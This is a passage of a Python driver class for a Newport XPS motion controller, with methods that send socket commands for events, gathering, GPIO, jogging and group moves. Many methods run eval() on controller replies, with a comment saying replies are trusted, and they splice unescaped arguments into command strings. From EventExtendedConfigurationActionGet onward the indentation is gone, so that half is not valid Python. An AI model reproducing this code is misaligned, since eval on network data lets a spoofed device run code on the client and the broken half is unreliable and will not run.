        """Get controller motion kernel time load.

        Returns [errorCode, load1, load2, load3, load4] (four doubles) on
        success, [errorCode, rawString] on controller error.
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'ControllerMotionKernelTimeLoadGet(double *,double *,double *,double *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        if (error != 0):
            return [error, returnedString]
        # Parse four comma-separated numeric values out of the reply.
        i, j, retList = 0, 0, [error]
        for paramNb in range(4):
            while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
                j += 1
            retList.append(eval(returnedString[i:i+j]))
            i, j = i+j+1, 0
        return retList
    # ControllerStatusGet : Read controller current status
    def ControllerStatusGet (self, socketId):
        """Read controller current status.

        Returns [errorCode, statusCode(int)] on success.
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'ControllerStatusGet(int *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        if (error != 0):
            return [error, returnedString]
        # eval() converts the numeric text; controller replies are trusted.
        i, j, retList = 0, 0, [error]
        while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
            j += 1
        retList.append(eval(returnedString[i:i+j]))
        return retList
    # ControllerStatusStringGet : Return the controller status string corresponding to the controller status code
    def ControllerStatusStringGet (self, socketId, ControllerStatusCode):
        """Return [errorCode, statusString] for a numeric controller status code."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'ControllerStatusStringGet(' + str(ControllerStatusCode) + ',char *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # ElapsedTimeGet : Return elapsed time from controller power on
    def ElapsedTimeGet (self, socketId):
        """Return [errorCode, elapsedSeconds(double)] since controller power on."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'ElapsedTimeGet(double *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        if (error != 0):
            return [error, returnedString]
        i, j, retList = 0, 0, [error]
        while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
            j += 1
        retList.append(eval(returnedString[i:i+j]))
        return retList
    # ErrorStringGet : Return the error string corresponding to the error code
    def ErrorStringGet (self, socketId, ErrorCode):
        """Return [errorCode, errorString] describing a numeric error code."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'ErrorStringGet(' + str(ErrorCode) + ',char *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # FirmwareVersionGet : Return firmware version
    def FirmwareVersionGet (self, socketId):
        """Return [errorCode, firmwareVersionString] from the controller."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'FirmwareVersionGet(char *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # TCLScriptExecute : Execute a TCL script from a TCL file
    def TCLScriptExecute (self, socketId, TCLFileName, TaskName, ParametersList):
        """Start a TCL script on the controller (does not wait for completion).

        Returns [errorCode, returnedString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'TCLScriptExecute(' + TCLFileName + ',' + TaskName + ',' + ParametersList + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # TCLScriptExecuteAndWait : Execute a TCL script from a TCL file and wait the end of execution to return
    def TCLScriptExecuteAndWait (self, socketId, TCLFileName, TaskName, InputParametersList):
        """Run a TCL script and block until it finishes.

        Returns [errorCode, outputParametersString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'TCLScriptExecuteAndWait(' + TCLFileName + ',' + TaskName + ',' + InputParametersList + ',char *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # TCLScriptExecuteWithPriority : Execute a TCL script with defined priority
    def TCLScriptExecuteWithPriority (self, socketId, TCLFileName, TaskName, TaskPriorityLevel, ParametersList):
        """Start a TCL script at the given task priority level.

        Returns [errorCode, returnedString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'TCLScriptExecuteWithPriority(' + TCLFileName + ',' + TaskName + ',' + TaskPriorityLevel + ',' + ParametersList + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # TCLScriptKill : Kill TCL Task
    def TCLScriptKill (self, socketId, TaskName):
        """Kill the named TCL task.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'TCLScriptKill(' + TaskName + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # TimerGet : Get a timer
    def TimerGet (self, socketId, TimerName):
        """Get a timer's period.  Returns [errorCode, frequencyTicks(int)]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'TimerGet(' + TimerName + ',int *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        if (error != 0):
            return [error, returnedString]
        i, j, retList = 0, 0, [error]
        while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
            j += 1
        retList.append(eval(returnedString[i:i+j]))
        return retList
    # TimerSet : Set a timer
    def TimerSet (self, socketId, TimerName, FrequencyTicks):
        """Set a timer's period in servo-loop ticks.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'TimerSet(' + TimerName + ',' + str(FrequencyTicks) + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # Reboot : Reboot the controller
    def Reboot (self, socketId):
        """Reboot the controller.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'Reboot()'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # Login : Log in
    def Login (self, socketId, Name, Password):
        """Log in with user name and password.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'Login(' + Name + ',' + Password + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # CloseAllOtherSockets : Close all socket beside the one used to send this command
    def CloseAllOtherSockets (self, socketId):
        """Ask the controller to close every connection except this one.

        Returns [errorCode, returnedString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'CloseAllOtherSockets()'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # HardwareDateAndTimeGet : Return hardware date and time
    def HardwareDateAndTimeGet (self, socketId):
        """Return [errorCode, dateAndTimeString] from the controller clock."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'HardwareDateAndTimeGet(char *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # HardwareDateAndTimeSet : Set hardware date and time
    def HardwareDateAndTimeSet (self, socketId, DateAndTime):
        """Set the controller clock from a date/time string.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'HardwareDateAndTimeSet(' + DateAndTime + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # EventAdd : ** OBSOLETE ** Add an event
    def EventAdd (self, socketId, PositionerName, EventName, EventParameter, ActionName, ActionParameter1, ActionParameter2, ActionParameter3):
        """** OBSOLETE ** Add an event/action pair (use the EventExtended* API).

        Returns [errorCode, returnedString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'EventAdd(' + PositionerName + ',' + EventName + ',' + EventParameter + ',' + ActionName + ',' + ActionParameter1 + ',' + ActionParameter2 + ',' + ActionParameter3 + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # EventGet : ** OBSOLETE ** Read events and actions list
    def EventGet (self, socketId, PositionerName):
        """** OBSOLETE ** Read the events/actions list for a positioner.

        Returns [errorCode, returnedString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'EventGet(' + PositionerName + ',char *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # EventRemove : ** OBSOLETE ** Delete an event
    def EventRemove (self, socketId, PositionerName, EventName, EventParameter):
        """** OBSOLETE ** Delete an event.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'EventRemove(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # EventWait : ** OBSOLETE ** Wait an event
    def EventWait (self, socketId, PositionerName, EventName, EventParameter):
        """** OBSOLETE ** Block until the event occurs.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'EventWait(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # EventExtendedConfigurationTriggerSet : Configure one or several events
    def EventExtendedConfigurationTriggerSet (self, socketId, ExtendedEventName, EventParameter1, EventParameter2, EventParameter3, EventParameter4):
        """Configure one or several event triggers.

        All five arguments are parallel sequences of equal length; each
        index describes one trigger.  Returns [errorCode, returnedString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'EventExtendedConfigurationTriggerSet('
        # Flatten the parallel lists into one comma-separated argument list.
        for i in range(len(ExtendedEventName)):
            if (i > 0):
                command += ','
            command += ExtendedEventName[i] + ',' + EventParameter1[i] + ',' + EventParameter2[i] + ',' + EventParameter3[i] + ',' + EventParameter4[i]
        command += ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # EventExtendedConfigurationTriggerGet : Read the event configuration
    def EventExtendedConfigurationTriggerGet (self, socketId):
        """Read the current event trigger configuration.  Returns [errorCode, returnedString]."""
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'EventExtendedConfigurationTriggerGet(char *)'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
    # EventExtendedConfigurationActionSet : Configure one or several actions
    def EventExtendedConfigurationActionSet (self, socketId, ExtendedActionName, ActionParameter1, ActionParameter2, ActionParameter3, ActionParameter4):
        """Configure one or several actions.

        All five arguments are parallel sequences of equal length; each
        index describes one action.  Returns [errorCode, returnedString].
        """
        if (XPS.__usedSockets[socketId] == 0):
            return
        command = 'EventExtendedConfigurationActionSet('
        # Flatten the parallel lists into one comma-separated argument list.
        for i in range(len(ExtendedActionName)):
            if (i > 0):
                command += ','
            command += ExtendedActionName[i] + ',' + ActionParameter1[i] + ',' + ActionParameter2[i] + ',' + ActionParameter3[i] + ',' + ActionParameter4[i]
        command += ')'
        [error, returnedString] = self.__sendAndReceive(socketId, command)
        return [error, returnedString]
# EventExtendedConfigurationActionGet : Read the action configuration
def EventExtendedConfigurationActionGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationActionGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedStart : Launch the last event and action configuration and return an ID
def EventExtendedStart (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedStart(int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# EventExtendedAllGet : Read all event and action configurations
def EventExtendedAllGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedAllGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedGet : Read the event and action configuration defined by ID
def EventExtendedGet (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedGet(' + str(ID) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedRemove : Remove the event and action configuration defined by ID
def EventExtendedRemove (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedRemove(' + str(ID) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedWait : Wait events from the last event configuration
def EventExtendedWait (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedWait()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationGet : Read different mnemonique type
def GatheringConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationSet : Configuration acquisition
def GatheringConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringStopAndSave : Stop acquisition and save data
def GatheringStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataAcquire : Acquire a configured data
def GatheringDataAcquire (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataAcquire()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataGet : Get a data line from gathering buffer
def GatheringDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataMultipleLinesGet : Get multiple data lines from gathering buffer
def GatheringDataMultipleLinesGet (self, socketId, IndexPoint, NumberOfLines):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataMultipleLinesGet(' + str(IndexPoint) + ',' + str(NumberOfLines) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringReset : Empty the gathered data in memory to start new gathering from scratch
def GatheringReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRun : Start a new gathering
def GatheringRun (self, socketId, DataNumber, Divisor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRun(' + str(DataNumber) + ',' + str(Divisor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRunAppend : Re-start the stopped gathering to add new data
def GatheringRunAppend (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRunAppend()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringStop : Stop the data gathering (without saving to file)
def GatheringStop (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStop()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationSet : Configuration acquisition
def GatheringExternalConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationGet : Read different mnemonique type
def GatheringExternalConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringExternalCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringExternalDataGet : Get a data line from external gathering buffer
def GatheringExternalDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalStopAndSave : Stop acquisition and save data
def GatheringExternalStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArrayGet : Get global array value
def GlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArrayGet(' + str(Number) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArraySet : Set global array value
def GlobalArraySet (self, socketId, Number, ValueString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArraySet(' + str(Number) + ',' + ValueString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# DoubleGlobalArrayGet : Get double global array value
def DoubleGlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArrayGet(' + str(Number) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# DoubleGlobalArraySet : Set double global array value
def DoubleGlobalArraySet (self, socketId, Number, DoubleValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArraySet(' + str(Number) + ',' + str(DoubleValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGet : Read analog input or analog output for one or few input
def GPIOAnalogGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogSet : Set analog output for one or few output
def GPIOAnalogSet (self, socketId, GPIOName, AnalogOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogOutputValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGainGet : Read analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGainGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'int *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogGainSet : Set analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainSet (self, socketId, GPIOName, AnalogInputGainValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGainSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogInputGainValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIODigitalGet : Read digital output or digital input
def GPIODigitalGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalGet(' + GPIOName + ',unsigned short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GPIODigitalSet : Set Digital Output for one or few output TTL
def GPIODigitalSet (self, socketId, GPIOName, Mask, DigitalOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalSet(' + GPIOName + ',' + str(Mask) + ',' + str(DigitalOutputValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAccelerationSetpointGet : Return setpoint accelerations
def GroupAccelerationSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAccelerationSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupAnalogTrackingModeEnable : Enable Analog Tracking mode on selected group
def GroupAnalogTrackingModeEnable (self, socketId, GroupName, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeEnable(' + GroupName + ',' + Type + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAnalogTrackingModeDisable : Disable Analog Tracking mode on selected group
def GroupAnalogTrackingModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupCorrectorOutputGet : Return corrector outputs
def GroupCorrectorOutputGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCorrectorOutputGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupCurrentFollowingErrorGet : Return current following errors
def GroupCurrentFollowingErrorGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCurrentFollowingErrorGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupHomeSearch : Start home search sequence
def GroupHomeSearch (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearch(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupHomeSearchAndRelativeMove : Start home search sequence and execute a displacement
def GroupHomeSearchAndRelativeMove (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearchAndRelativeMove(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitialize : Start the initialization
def GroupInitialize (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitialize(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitializeWithEncoderCalibration : Start the initialization with encoder calibration
def GroupInitializeWithEncoderCalibration (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitializeWithEncoderCalibration(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersSet : Modify Jog parameters on selected group and activate the continuous move
def GroupJogParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersSet(' + GroupName + ','
for i in range(len(Velocity)):
if (i > 0):
command += ','
command += str(Velocity[i]) + ',' + str(Acceleration[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersGet : Get Jog parameters on selected group
def GroupJogParametersGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogCurrentGet : Get Jog current on selected group
def GroupJogCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogModeEnable : Enable Jog mode on selected group
def GroupJogModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogModeDisable : Disable Jog mode on selected group
def GroupJogModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupKill : Kill the group
def GroupKill (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupKill(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbort : Abort a move
def GroupMoveAbort (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbort(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbsolute : Do an absolute move
def GroupMoveAbsolute (self, socketId, GroupName, TargetPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbsolute(' + GroupName + ','
for i in range(len(TargetPosition)):
if (i > 0):
command += ','
command += str(TargetPosition[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveRelative : Do a relative move
def GroupMoveRelative (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveRelative(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionDisable : Set Motion disable on selected group
def GroupMotionDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionEnable : Set Motion enable on selected group
def GroupMotionEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupPositionCorrectedProfilerGet : Return corrected profiler positions
def GroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionCurrentGet : Return current positions
def GroupPositionCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
